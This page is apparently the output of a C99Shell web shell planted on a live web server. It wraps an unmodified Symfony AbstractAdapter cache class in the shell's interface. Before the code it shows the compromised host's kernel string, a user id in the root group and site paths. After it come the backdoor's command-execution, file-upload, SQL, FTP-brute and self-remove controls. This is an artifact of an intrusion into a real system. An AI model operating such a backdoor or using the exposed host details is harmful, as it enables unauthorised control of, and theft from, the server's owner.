!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/vendor/symfony/cache/Adapter/   drwxr-xr-x
Free 29.17 GB of 117.98 GB (24.72%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     AbstractAdapter.php (7.31 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier <fabien@symfony.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Symfony\Component\Cache\Adapter;

use 
Psr\Log\LoggerAwareInterface;
use 
Psr\Log\LoggerInterface;
use 
Symfony\Component\Cache\CacheItem;
use 
Symfony\Component\Cache\Exception\InvalidArgumentException;
use 
Symfony\Component\Cache\ResettableInterface;
use 
Symfony\Component\Cache\Traits\AbstractAdapterTrait;
use 
Symfony\Component\Cache\Traits\ContractsTrait;
use 
Symfony\Contracts\Cache\CacheInterface;

/**
 * @author Nicolas Grekas <p@tchwork.com>
 */
abstract class AbstractAdapter implements AdapterInterfaceCacheInterfaceLoggerAwareInterfaceResettableInterface
{
    use 
AbstractAdapterTrait;
    use 
ContractsTrait;

    
/**
     * @internal
     */
    
protected const NS_SEPARATOR ':';

    private static 
bool $apcuSupported;

    protected function 
__construct(string $namespace ''int $defaultLifetime 0)
    {
        
$this->namespace '' === $namespace '' CacheItem::validateKey($namespace).static::NS_SEPARATOR;
        
$this->defaultLifetime $defaultLifetime;
        if (
null !== $this->maxIdLength && \strlen($namespace) > $this->maxIdLength 24) {
            throw new 
InvalidArgumentException(sprintf('Namespace must be %d chars max, %d given ("%s").'$this->maxIdLength 24\strlen($namespace), $namespace));
        }
        
self::$createCacheItem ??= \Closure::bind(
            static function (
$key$value$isHit) {
                
$item = new CacheItem();
                
$item->key $key;
                
$item->value $value;
                
$item->isHit $isHit;
                
$item->unpack();

                return 
$item;
            },
            
null,
            
CacheItem::class
        );
        
self::$mergeByLifetime ??= \Closure::bind(
            static function (
$deferred$namespace, &$expiredIds$getId$defaultLifetime) {
                
$byLifetime = [];
                
$now microtime(true);
                
$expiredIds = [];

                foreach (
$deferred as $key => $item) {
                    
$key = (string) $key;
                    if (
null === $item->expiry) {
                        
$ttl $defaultLifetime $defaultLifetime 0;
                    } elseif (!
$item->expiry) {
                        
$ttl 0;
                    } elseif (
>= $ttl = (int) (0.1 $item->expiry $now)) {
                        
$expiredIds[] = $getId($key);
                        continue;
                    }
                    
$byLifetime[$ttl][$getId($key)] = $item->pack();
                }

                return 
$byLifetime;
            },
            
null,
            
CacheItem::class
        );
    }

    
/**
     * Returns the best possible adapter that your runtime supports.
     *
     * Using ApcuAdapter makes system caches compatible with read-only filesystems.
     */
    
public static function createSystemCache(string $namespaceint $defaultLifetimestring $versionstring $directory, ?LoggerInterface $logger null): AdapterInterface
    
{
        
$opcache = new PhpFilesAdapter($namespace$defaultLifetime$directorytrue);
        if (
null !== $logger) {
            
$opcache->setLogger($logger);
        }

        if (!
self::$apcuSupported ??= ApcuAdapter::isSupported()) {
            return 
$opcache;
        }

        if (
'cli' === \PHP_SAPI && !filter_var(\ini_get('apc.enable_cli'), \FILTER_VALIDATE_BOOL)) {
            return 
$opcache;
        }

        
$apcu = new ApcuAdapter($namespaceintdiv($defaultLifetime5), $version);
        if (
null !== $logger) {
            
$apcu->setLogger($logger);
        }

        return new 
ChainAdapter([$apcu$opcache]);
    }

    public static function 
createConnection(#[\SensitiveParameterstring $dsn, array $options = []): mixed
    
{
        if (
str_starts_with($dsn'redis:') || str_starts_with($dsn'rediss:')) {
            return 
RedisAdapter::createConnection($dsn$options);
        }
        if (
str_starts_with($dsn'memcached:')) {
            return 
MemcachedAdapter::createConnection($dsn$options);
        }
        if (
str_starts_with($dsn'couchbase:')) {
            if (
class_exists('CouchbaseBucket') && CouchbaseBucketAdapter::isSupported()) {
                return 
CouchbaseBucketAdapter::createConnection($dsn$options);
            }

            return 
CouchbaseCollectionAdapter::createConnection($dsn$options);
        }
        if (
preg_match('/^(mysql|oci|pgsql|sqlsrv|sqlite):/'$dsn)) {
            return 
PdoAdapter::createConnection($dsn$options);
        }

        throw new 
InvalidArgumentException('Unsupported DSN: it does not start with "redis[s]:", "memcached:", "couchbase:", "mysql:", "oci:", "pgsql:", "sqlsrv:" nor "sqlite:".');
    }

    public function 
commit(): bool
    
{
        
$ok true;
        
$byLifetime = (self::$mergeByLifetime)($this->deferred$this->namespace$expiredIds$this->getId(...), $this->defaultLifetime);
        
$retry $this->deferred = [];

        if (
$expiredIds) {
            try {
                
$this->doDelete($expiredIds);
            } catch (
\Exception $e) {
                
$ok false;
                
CacheItem::log($this->logger'Failed to delete expired items: '.$e->getMessage(), ['exception' => $e'cache-adapter' => get_debug_type($this)]);
            }
        }
        foreach (
$byLifetime as $lifetime => $values) {
            try {
                
$e $this->doSave($values$lifetime);
            } catch (
\Exception $e) {
            }
            if (
true === $e || [] === $e) {
                continue;
            }
            if (
\is_array($e) || === \count($values)) {
                foreach (
\is_array($e) ? $e array_keys($values) as $id) {
                    
$ok false;
                    
$v $values[$id];
                    
$type get_debug_type($v);
                    
$message sprintf('Failed to save key "{key}" of type %s%s'$type$e instanceof \Exception ': '.$e->getMessage() : '.');
                    
CacheItem::log($this->logger$message, ['key' => substr($id\strlen($this->namespace)), 'exception' => $e instanceof \Exception $e null'cache-adapter' => get_debug_type($this)]);
                }
            } else {
                foreach (
$values as $id => $v) {
                    
$retry[$lifetime][] = $id;
                }
            }
        }

        
// When bulk-save failed, retry each item individually
        
foreach ($retry as $lifetime => $ids) {
            foreach (
$ids as $id) {
                try {
                    
$v $byLifetime[$lifetime][$id];
                    
$e $this->doSave([$id => $v], $lifetime);
                } catch (
\Exception $e) {
                }
                if (
true === $e || [] === $e) {
                    continue;
                }
                
$ok false;
                
$type get_debug_type($v);
                
$message sprintf('Failed to save key "{key}" of type %s%s'$type$e instanceof \Exception ': '.$e->getMessage() : '.');
                
CacheItem::log($this->logger$message, ['key' => substr($id\strlen($this->namespace)), 'exception' => $e instanceof \Exception $e null'cache-adapter' => get_debug_type($this)]);
            }
        }

        return 
$ok;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0045 ]--